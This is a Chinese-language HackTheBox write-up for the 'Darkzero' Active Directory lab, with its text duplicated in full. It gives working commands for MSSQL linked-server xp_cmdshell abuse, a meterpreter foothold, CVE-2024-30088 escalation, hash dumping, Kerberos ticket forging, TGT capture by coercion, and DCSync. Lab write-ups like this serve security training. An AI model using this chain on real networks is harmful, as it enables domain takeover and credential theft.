HackTheBox Darkzero Writeup

HackTheBox Darkzero 是一台困难难度的 Windows 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。

htb darkzero

枚举

As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!

# Nmap 7.98 scan initiated Sat Mar 28 06:41:15 2026 as: /usr/lib/nmap/nmap -sC -sV -T4 -oN nmap_result.txt -p- 10.129.9.233
Nmap scan report for 10.129.9.233
Host is up (0.27s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-28 06:48:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.9.233:1433:
|     Target_Name: darkzero
|     NetBIOS_Domain_Name: darkzero
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: darkzero.htb
|     DNS_Computer_Name: DC01.darkzero.htb
|     DNS_Tree_Name: darkzero.htb
|_    Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-28T06:22:44
|_Not valid after:  2056-03-28T06:22:44
| ms-sql-info:
|   10.129.9.233:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-28T06:49:55+00:00; 0s from scanner time.
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49895/tcp open  msrpc         Microsoft Windows RPC
49926/tcp open  msrpc         Microsoft Windows RPC
50344/tcp open  msrpc         Microsoft Windows RPC
58507/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/28%Time=69C779B9%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-03-28T06:49:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 06:49:58 2026 -- 1 IP address (1 host up) scanned in 523.23 seconds

MSSQL

枚举发现链接服务器

SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL
DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
# darkzero-ext\svc_sql

最后通过msfconsole可以获得meterpreter

进入后枚举发现该机器居然没有打任何补丁

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 DC02
OS Name:                   Microsoft Windows Server 2022 Datacenter
OS Version:                10.0.20348 N/A Build 20348
Hotfix(s):                 N/A

使用exploit/windows/local/cve_2024_30088_authz_basep提升权限

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:7b0e719ff0de15e5072e9ce7f5d42030:::

Trust Key

关于 Trust Key 伪造票据

这个操作需要几个信息:

  1. darkzero$ 的 NTLM hash ✓ 有了
  2. darkzero.ext 域的 SID
  3. darkzero.htb 域的 SID
  4. krbtgt 的 hash(darkzero.ext 的)✓ 有了
impacket-lookupsid darkzero/john.w@10.129.13.228
# [*] Domain SID is: S-1-5-21-1152179935-589108180-1989892463
PS C:\Windows\system32> (Get-ADDomain).DomainSID.Value
S-1-5-21-1969715525-31638512-2552845157
  DarkZero impacket-ticketer -nthash 7b0e719ff0de15e5072e9ce7f5d42030\
  -domain-sid S-1-5-21-1969715525-31638512-2552845157 \
  -domain darkzero.ext \
  -extra-sid S-1-5-21-1152179935-589108180-1989892463-519 \
  Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkzero.ext/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
  DarkZero export KRB5CCNAME=Administrator.ccache
  DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
  DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] unpack requires a buffer of 4 bytes
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

失败了,说明DC01上存储的信任用户不是darkzero$

枚举域信任

PS C:\Windows\system32> Get-ADTrust -Filter *
Get-ADTrust -Filter *

Direction               : BiDirectional  #  双向信任,两边都能互访。
DisallowTransivity      : False
DistinguishedName       : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive        : True
IntraForest             : False
IsTreeParent            : False
IsTreeRoot              : False
Name                    : darkzero.htb
ObjectClass             : trustedDomain
ObjectGUID              : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=darkzero,DC=ext
Target                  : darkzero.htb
TGTDelegation           : False
TrustAttributes         : 8
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False # 不用 RC4,用 AES。

我们在DC02启动监听

Rubeus.exe monitor /interval:1 /nowrap

使用mssql进入DC01进行smb访问

SQL (darkzero\john.w  guest@master)> xp_dirtree \\DC02.darkzero.ext\a
subdirectory   depth   file
------------   -----   ----

即可得到:

image 169.png

# 先把 base64 转成 kirbi
base64 -d DC01.txt > DC01.kirbi

# 再用 impacket 转成 ccache
impacket-ticketConverter DC01.kirbi DC01.ccache

# 导入并验证
export KRB5CCNAME=DC01.ccache
klist
impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc

即可获取administrator的ntlm


总结

官方凭据 john.w
 DC01 MSSQL 登录
 枚举链接服务器,发现 DC02.darkzero.ext
 链接服务器启用 xp_cmdshell
 上传 rcat.exe,获得 DC02 meterpreter (svc_sql)
 systeminfo 发现无补丁 + CVE-2024-30088 提权到 SYSTEM
 Rubeus monitor SYSTEM 运行监听票据
 DC01 MSSQL 执行 xp_dirtree \\DC02\a 触发 Kerberos 认证
 Rubeus 捕获 DC01$@DARKZERO.HTB TGT
 base64 解码 kirbi ccache 转换
 secretsdump DCSync dump DC01 所有 hash
 Administrator PTH DC01 shell

HTB darkzero

枚举

As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!

# Nmap 7.98 scan initiated Sat Mar 28 06:41:15 2026 as: /usr/lib/nmap/nmap -sC -sV -T4 -oN nmap_result.txt -p- 10.129.9.233
Nmap scan report for 10.129.9.233
Host is up (0.27s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-28 06:48:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.9.233:1433:
|     Target_Name: darkzero
|     NetBIOS_Domain_Name: darkzero
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: darkzero.htb
|     DNS_Computer_Name: DC01.darkzero.htb
|     DNS_Tree_Name: darkzero.htb
|_    Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-28T06:22:44
|_Not valid after:  2056-03-28T06:22:44
| ms-sql-info:
|   10.129.9.233:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-28T06:49:55+00:00; 0s from scanner time.
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49895/tcp open  msrpc         Microsoft Windows RPC
49926/tcp open  msrpc         Microsoft Windows RPC
50344/tcp open  msrpc         Microsoft Windows RPC
58507/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/28%Time=69C779B9%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-03-28T06:49:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 06:49:58 2026 -- 1 IP address (1 host up) scanned in 523.23 seconds

MSSQL

枚举发现链接服务器

SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL
DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
# darkzero-ext\svc_sql

最后通过msfconsole可以获得meterpreter

进入后枚举发现该机器居然没有打任何补丁

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 DC02
OS Name:                   Microsoft Windows Server 2022 Datacenter
OS Version:                10.0.20348 N/A Build 20348
Hotfix(s):                 N/A

使用exploit/windows/local/cve_2024_30088_authz_basep提升权限

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:7b0e719ff0de15e5072e9ce7f5d42030:::

Trust Key

关于 Trust Key 伪造票据

这个操作需要几个信息:

  1. darkzero$ 的 NTLM hash ✓ 有了
  2. darkzero.ext 域的 SID
  3. darkzero.htb 域的 SID
  4. krbtgt 的 hash(darkzero.ext 的)✓ 有了
impacket-lookupsid darkzero/john.w@10.129.13.228
# [*] Domain SID is: S-1-5-21-1152179935-589108180-1989892463
PS C:\Windows\system32> (Get-ADDomain).DomainSID.Value
S-1-5-21-1969715525-31638512-2552845157
  DarkZero impacket-ticketer -nthash 7b0e719ff0de15e5072e9ce7f5d42030\
  -domain-sid S-1-5-21-1969715525-31638512-2552845157 \
  -domain darkzero.ext \
  -extra-sid S-1-5-21-1152179935-589108180-1989892463-519 \
  Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkzero.ext/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
  DarkZero export KRB5CCNAME=Administrator.ccache
  DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
  DarkZero impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] unpack requires a buffer of 4 bytes
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

失败了,说明DC01上存储的信任用户不是darkzero$

枚举域信任

PS C:\Windows\system32> Get-ADTrust -Filter *
Get-ADTrust -Filter *

Direction               : BiDirectional  #  双向信任,两边都能互访。
DisallowTransivity      : False
DistinguishedName       : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive        : True
IntraForest             : False
IsTreeParent            : False
IsTreeRoot              : False
Name                    : darkzero.htb
ObjectClass             : trustedDomain
ObjectGUID              : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=darkzero,DC=ext
Target                  : darkzero.htb
TGTDelegation           : False
TrustAttributes         : 8
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False # 不用 RC4,用 AES。

我们在DC02启动监听

Rubeus.exe monitor /interval:1 /nowrap

使用mssql进入DC01进行smb访问

SQL (darkzero\john.w  guest@master)> xp_dirtree \\DC02.darkzero.ext\a
subdirectory   depth   file
------------   -----   ----

即可得到:

image 169.png

# 先把 base64 转成 kirbi
base64 -d DC01.txt > DC01.kirbi

# 再用 impacket 转成 ccache
impacket-ticketConverter DC01.kirbi DC01.ccache

# 导入并验证
export KRB5CCNAME=DC01.ccache
klist
impacket-secretsdump -k -no-pass DC01.darkzero.htb -just-dc

即可获取administrator的ntlm


总结

官方凭据 john.w
 DC01 MSSQL 登录
 枚举链接服务器,发现 DC02.darkzero.ext
 链接服务器启用 xp_cmdshell
 上传 rcat.exe,获得 DC02 meterpreter (svc_sql)
 systeminfo 发现无补丁 + CVE-2024-30088 提权到 SYSTEM
 Rubeus monitor SYSTEM 运行监听票据
 DC01 MSSQL 执行 xp_dirtree \\DC02\a 触发 Kerberos 认证
 Rubeus 捕获 DC01$@DARKZERO.HTB TGT
 base64 解码 kirbi ccache 转换
 secretsdump DCSync dump DC01 所有 hash
 Administrator PTH DC01 shell